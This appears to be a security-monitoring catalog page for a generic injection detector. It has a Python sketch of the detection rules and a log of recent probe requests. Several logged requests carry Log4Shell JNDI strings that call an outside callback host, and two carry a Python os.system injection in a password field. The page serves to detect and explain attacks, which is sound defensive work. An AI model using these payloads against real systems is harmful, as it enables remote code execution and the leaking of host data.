Annotator injg

General injection attempts

Suspicious input patterns consistent with injection-like probing across multiple families.

Attack family · Generic injection and parser abuse
Phase · Reconnaissance and exploit staging
Risk · Medium to high

What This Annotator Watches

This explanation is derived from the live annotator implementation, not hand-waved catalog copy.
Focus
  • Generic crafted-input probing across multiple injection families
  • XXE, JNDI, LDAP, NoSQL, SSTI, OGNL, and expression-style payloads
  • Input that does not fit neatly into one narrower exploit family
Logic
  • The annotator recognizes broad-spectrum injection payload structures.
  • Specific families like JNDI or OGNL raise stronger findings than generic operator noise.
  • It is intentionally broad and is best interpreted alongside more specific annotators when they co-occur.
Attack Family
Generic injection and parser abuse
This family catches crafted input that is clearly trying to influence how something parses, evaluates, resolves, or expands, even when the payload does not sit neatly inside one named exploit family.
Damage Patterns
  • Generic injection often precedes the more specific exploit signal because the attacker is first discovering what parser or interpreter is in play.
  • It can still do real damage by reaching overlooked template engines, deserializers, expression evaluators, or external resolvers.
Incident Lore
  • Some of the ugliest incident stories started with defenders dismissing weird metacharacters as noise because they did not look like textbook SQLi.
  • This is often the lore of near misses, odd parser behavior, and the exploit family that only becomes obvious after the fact.
How To Read It
Use this as the wide-angle injection signal when the request was clearly crafted but not purely SQLi, header injection, or command injection.
Defender Takeaway
Treat this as crafted-input pressure. The attacker is feeling for any interpreter that will answer back.
Catalog Definition
A broad-spectrum injection signal for suspicious input patterns that do not cleanly map to a specific exploit family. This can include odd metacharacters, encoding tricks, and payload fragments that suggest an attempt to influence parsing or evaluation. Treat this as “generic crafted input” and interpret alongside more specific annotators (SQLi, header injection, command injection) when they co-occur.
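
A sketch of the tiering described above, added here as an example and not the annotator's implementation. The rule IDs `injg:jndi_log4shell` and `injg:code_exec_tokens` and the severities 36 and 24 are taken from this page's sample data; the regexes, the `example:generic_operator` tier with its severity, and the sample requests in the comments are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# (rule id, severity, pattern). The first two ids and severities appear in
# this page's samples; every regex and the third rule are assumptions.
RULES = [
    ("injg:jndi_log4shell", 36, re.compile(r"\$\{\s*jndi\s*:", re.I)),
    ("injg:code_exec_tokens", 24,
     re.compile(r"\b(?:os\.system|subprocess\.\w+|Runtime\.getRuntime)\s*\(")),
    ("example:generic_operator", 10,  # hypothetical low tier: operator noise
     re.compile(r"\$\{|\{\{|<!ENTITY|\[\$(?:ne|gt|where)\]", re.I)),
]

# Log4j-style lookups with a default value, e.g. ${:-210}, evaluate to the
# text after ":-". Collapsing them shows the string the logger would see.
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")


def normalize(text, max_rounds=5):
    """Percent-decode and collapse default lookups until the text is stable."""
    for _ in range(max_rounds):  # bounded, so nested encoding cannot loop forever
        collapsed = _DEFAULT_LOOKUP.sub(r"\1", unquote(text))
        if collapsed == text:
            break
        text = collapsed
    return text


def annotate(request_text):
    """Return every matching (rule id, severity), strongest finding first."""
    text = normalize(request_text)
    hits = [(rid, sev) for rid, sev, rx in RULES if rx.search(text)]
    return sorted(hits, key=lambda h: h[1], reverse=True)


if __name__ == "__main__":
    # Constructed request lines (hosts and paths are placeholders).
    for line in [
        "/?x=${jndi:ldap://127.0.0.1",
        "/?x=%2524%257Bjndi%253Aldap%253A%252F%252Fexample.invalid%252Fa%257D",
        "/app?password=g%27%29%3Bimport%20os%3Bos.system%28%27PLACEHOLDER%27%29",
        "/search?q[$ne]=1",
        "/index.html?page=2",
    ]:
        print(annotate(line), line)
```

A request that matches a specific family also matches the generic tier, so the sorted result keeps the strongest rule first, which is the ordering the Logic notes describe.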

10 Most Recent Real Samples

Weekly cached from live annotated access events so the catalog stays fast.
Week: 2026W16
Lookback: 30 days
Total matched: 12
Latest sample: Mar 29, 2026 • 22:00
Top rules: injg:jndi_log4shell · 8, injg:code_exec_tokens · 2
Top requester orgs: FranTech Solutions · 8, Private Customer · 2
Severity mix: 36 · 8, 24 · 2
Method mix: GET · 10

GET · Status 200 · Severity 36 · Mar 29, 2026 • 22:00
Path: /
Finding: JNDI injection string (Log4Shell-style) observed
IP 151.243.11.23 · Subnet 151.243.11.0/24 · Org Private Customer · Country Germany · Rule injg:jndi_log4shell

GET · Status 301 · Severity 36 · Mar 29, 2026 • 22:00
Path: /
Finding: JNDI injection string (Log4Shell-style) observed
IP 151.243.11.23 · Subnet 151.243.11.0/24 · Org Private Customer · Country Germany · Rule injg:jndi_log4shell

GET · Status 301 · Severity 36 · Mar 22, 2026 • 12:47
Path: /
Finding: JNDI injection string (Log4Shell-style) observed
IP 107.189.16.114 · Subnet 107.189.16.0/24 · Org FranTech Solutions · Country Netherlands · Rule injg:jndi_log4shell

GET · Status 301 · Severity 36 · Mar 22, 2026 • 12:47
Path: /?x=${jndi:ldap://${:-210}${:-737}.${hostName}.uri.d6sh4csqftks16s5e3sg9fxiphagn3yob.oast.fun/a}
Finding: JNDI injection string (Log4Shell-style) observed
IP 107.189.16.114 · Subnet 107.189.16.0/24 · Org FranTech Solutions · Country Netherlands · Rule injg:jndi_log4shell

GET · Status 301 · Severity 36 · Mar 22, 2026 • 10:42
Path: /?x=${jndi:ldap://127.0.0.1
Finding: JNDI injection string (Log4Shell-style) observed
IP 107.189.16.114 · Subnet 107.189.16.0/24 · Org FranTech Solutions · Country Netherlands · Rule injg:jndi_log4shell

GET · Status 200 · Severity 36 · Mar 22, 2026 • 09:44
Path: /
Finding: JNDI injection string (Log4Shell-style) observed
IP 107.189.16.114 · Subnet 107.189.16.0/24 · Org FranTech Solutions · Country Netherlands · Rule injg:jndi_log4shell

GET · Status 200 · Severity 36 · Mar 22, 2026 • 09:43
Path: /?x=${jndi:ldap://${:-210}${:-737}.${hostName}.uri.d6sh4csqftks16s5e3sgyku1zm8pt44ck.oast.fun/a}
Finding: JNDI injection string (Log4Shell-style) observed
IP 107.189.16.114 · Subnet 107.189.16.0/24 · Org FranTech Solutions · Country Netherlands · Rule injg:jndi_log4shell

GET · Status 200 · Severity 36 · Mar 22, 2026 • 09:01
Path: /?x=${jndi:ldap://127.0.0.1
Finding: JNDI injection string (Log4Shell-style) observed
IP 107.189.16.114 · Subnet 107.189.16.0/24 · Org FranTech Solutions · Country Netherlands · Rule injg:jndi_log4shell

GET · Status 301 · Severity 24 · Mar 19, 2026 • 22:32
Path: /webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f20224d30497a…
Finding: Code execution token(s) in request text
IP 107.189.16.114 · Subnet 107.189.16.0/24 · Org FranTech Solutions · Country Netherlands · Rule injg:code_exec_tokens

GET · Status 404 · Severity 24 · Mar 19, 2026 • 19:12
Path: /webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f20224d30497a…
Finding: Code execution token(s) in request text
IP 107.189.16.114 · Subnet 107.189.16.0/24 · Org FranTech Solutions · Country Netherlands · Rule injg:code_exec_tokens